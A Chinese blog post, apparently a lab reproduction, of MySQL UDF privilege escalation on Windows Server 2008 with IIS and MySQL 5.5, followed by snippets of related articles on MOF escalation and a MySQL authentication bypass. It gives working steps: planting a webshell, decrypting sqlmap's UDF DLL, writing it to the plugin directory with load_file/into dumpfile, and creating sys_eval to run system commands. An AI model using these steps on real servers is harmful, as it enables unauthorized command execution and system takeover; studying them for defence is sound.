MySQL_UDF提权漏洞复现

已于 2024-06-23 17:49:48 修改
阅读量21 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全漏洞 web安全 安全 网络安全
于 2021-07-25 17:53:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/119085115
版权

 「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

 操作系统: Windows server 2008

Web环境: IIS 7.0 + MySQL 5.5.22

原理

UDF是mysql的一个接口,用来创建自定义函数(包括系统命令),但需要dll(程序扩展文件)作为udf的执行库

使用UDF提权需要满足一些条件

  1. mysql服务以system权限运行
  2. mysql开启远程连接,和文件读写功能
  3. 知道mysql的管理员账号和密码

环境准备

上传一句话木马并使用中国菜刀连接

上传木马文件到网站根目录( 默认是C:\inetpub\wwwroot )下,内容为一句话木马

使用中国菜刀连接木马文件

使用中国菜刀上传udf.dll文件

Windows版的SQLmap工具中提供了UDF提权所需的dll文件,但需要解密才能使用

将dll文件复制到SQLmap的extra/cloak目录下

使用cmd进入cloak.py所在目录,使用cloak.py解密文件( 需要python环境 )

python /cloak.py -d -i lib_mysqludf_sys.dll_

使用中国菜刀的文件管理功能将dll文件上传到c:/windows/temp目录下,该目录默认具有上传和执行权限

将文件移动到mysql的/lib/plugin目录下

使用物理机远程连接目标主机的mysql

获取MySQL的安装路径

show variables like '%plugin%'

利用MySQL的文件读写功能,将dll文件从c:/windows/temp目录移动到MySQL的安装路径下,dll文件只有在此目录下才能发挥作用

select load_file("c:/windows/temp/lib_mysqludf_sys.dll") into dumpfile "C:/Program Files/MySQL/MySQL Server 5.5/lib/plugin/mysqludf.dll";

创建自定义函数

利用dll文件创建能执行系统命令的函数

create function sys_eval returns string soname "mysqludf.dll";

使用自定义函数执行系统命令

select sys_eval("whoami");

士别三日wyx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
mysql提权之MOF、UDF复现
qq_25768397的博客
08-25 902
今天复现了一下mysql提权,以往都没有尝试过,所以搭建环境尝试一下。 搭建环境: phpstudy win7企业版 DVWA上传点 以上步骤省略,跳到getshell后,使用哥斯拉进行提权。(假设所有条件满足,如不满足,尝试其他方法) 一、MOF提权 原理: 利用c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会有一个特定的时间去执行一次,那么把cmd命令添加到nullevt.mof中,cmd命令就会自动执行了。 注:mysql5.7 开始默认使
mysqludf提权复现
Shanfenglan's blog
03-09 1903
文章目录参考文章 参考文章 udf提权原理详解
漏洞复现Mysql UDF提权
cj_Hydra's Blog
11-27 1895
前言: UDF (user defined function),即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,其实就像使用本地MySQL函数如 user() 或 concat() 等。 那么我们该如何使用UDF文件呢? 默认的
MySQL身份认证漏洞(CVE-2012-2122漏洞复现
weixin_48739941的博客
04-11 2870
(1)漏洞原理 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库漏洞编号。 (2)修复 ①对数据库进行升级打补丁。 ②在防火墙上关闭MySQL端口。 (3)cd vulhub/mysql/CVE-2012-2122 切换目录。 (4)vim docker-compose.yml 修改端口映射。 (5)dock
【数据库提权MySQL提权UDF提权
ssrf
10-24 1087
文章目录一、什么是UDF?二、什么是动态链接库?三、UDF提权原理 一、什么是UDFUDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,可以说是数据库功能的一种扩展,用户通过自定义函数来实现在MySQL中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像本机函数如ABS()或SOUNDEX()一样方便。 二、什么是动态链接库? DLL 是 Dynamic Link Library 的缩写,译为“动态
mysql.zip_ROOT_mysql提权_udf_udf mysql_提权
09-19
提权用的 udf 得到root帐号可以用这个提权
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权udf提权所需要的dll文件,有64位和32位
MYSQL_UDF-5.0.rar_mysql udf_udf_udf mysql
09-23
MySQL UDF(User Defined Function)是MySQL数据库系统中的一种扩展机制,允许用户自定义函数以满足特定的计算或处理需求。这些自定义函数通常用C或C++编写,然后编译为动态链接库(DLL),供MySQL服务器调用。本...
使用mysql_udf与curl库完成http_post通信模块示例
09-10
`mysql_udf`(MySQL User Defined Function)是MySQL提供的一种扩展机制,允许开发者使用C语言编写自定义函数,以增强数据库的功能。通过这个接口,我们可以创建自己的函数,使得MySQL能够调用C语言编写的模块来执行...
MySQL数据库渗透及漏洞利用总结
02-25
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和WAMP等,在针对网站渗透中,很多都是跟Mysql数据库有关,各种Mysql注入,Mysql提权Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用与提权》,但技术的进步有无止境,思想有多远,路就可以走多远,在研究mysql数据库安全之余,对Mysql如何通过msf、sqlmap等来进行扫描、漏洞
暗月mysql全版本通杀提权
06-21
暗月mysql全版本通杀提权
权限提升之Mysql提权-漏洞银行大咖面对面17
07-31
权限提升之Mysql提权-漏洞银行大咖面对面17-指剑碎星河大咖
UDF提权复现
qq_51459600的博客
03-30 751
文章目录UDF提权复现环境搭建UDF提权原理提权过程 UDF提权复现 环境搭建 靶机:虚拟机Win7+phpstudy2018 ​ mysql5.5.53 ​ php5.2.17 攻击机:物理机 在已经得到webshell的情况下,利用mysqlUDF提权,在靶机WIn7上创建administrator权限的用户 UDF提权原理 条件:得到服务器webshell,知道数据库账号密码且可以远程连接 在udf.dll文件中,定义了名为sys_eval()的函数,该函数可以执行系统命令,通过该函数来完成系
Linux提权—服务漏洞,以MySQL-UDF提权为例,2024年最新2024-2024阿里巴巴网络安全面试真题解析
最新发布
2301_77118221的博客
04-15 272
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!对于从来没有接触过网络安全的同学,我们帮你准备了详细的。资源较为敏感,未展示全面,需要的最下面获取。,大家跟着这个大的方向学习准没问题。
渗透测试:数据库UDF提权(linux)
qq_63442530的博客
04-01 1691
UDF:User Defined Function 用户自定义函数,MySQL数据库的初衷是用于方便用户进行自定义函数,方便查询一些复杂的数据,同时也有可能被攻击者利用,使用udf进行提权提权原理:攻击者通过编写,能调用cmd或者shell的共享库文件(window为.dll,linux为.so),并且导入到一个指定的文件夹目录下,在数据库中通过导入的共享库文件创建自定义函数,该自定义函数功能依照于共享库文件的功能,从而在数据库中调用该自定义函数能够使用系统命令。
Mysql身份认证漏洞复现(CVE-2012-2122)
又菜又爱倒腾的博客
10-29 2303
#Mysql身份认证漏洞(CVE-2012-2122)# 一、漏洞简介 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 二、漏洞影响 影响版本 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL vers
Mysql UDF提权复现Raven2
tpaer的博客
02-17 931
通过Raven2靶场复现Mysql UDF提权
mysql udf提权_mysql数据库漏洞利用及提权方式小结
weixin_39971435的博客
12-05 694
转先知社区作者:ghtwf01CVE-2012-2122 Mysql身份认证漏洞影响版本Mysql在5.5.24之前MariaDB也差不多这个版本之前漏洞原理只要知道用户名,不断尝试就能够直接登入SQL数据库,按照公告说法大约256次就能够蒙对一次漏洞复现msf利用hash解密得到密码即可登录python exp#!/usr/bin/pythonimport subprocesswhi...
Mysql_UDF提权
热门推荐
极客神殿
02-04 1万+
Root权限一、上传udf.dll小于mysql5.1版本 C:\WINDOWS\udf.dll 或 C:\WINDOWS\system32\udf.dll 等于mysql5.1版本 %mysql%\plugin\udf.dll 用 select @@plugin_dir 查询plugin路径 默认 C:\Program Files\MySQL\MySQL Server 5.
mysqludf提权
10-15
MySQLUDF(User-Defined Function)是用户自定义函数,可以在MySQL中创建自己的函数。但是,如果攻击者能够创建自己的UDF并将其加载到MySQL中,则可以利用UDF提权攻击,从而获得系统管理员权限。 攻击者可以通过以下步骤进行UDF提权攻击: 1. 创建一个恶意的UDF库文件,其中包含提权代码。 2. 将恶意UDF库文件上传到目标系统。 3. 在MySQL中创建一个新的UDF函数,该函数将调用恶意UDF库文件中的代码。 4. 执行新创建的UDF函数,从而触发提权代码。 为了防止UDF提权攻击,可以采取以下措施: 1. 禁用MySQL中的UDF功能。 2. 限制MySQL用户的权限,只允许他们执行安全的操作。 3. 定期更新MySQL和操作系统的补丁,以修复已知的漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值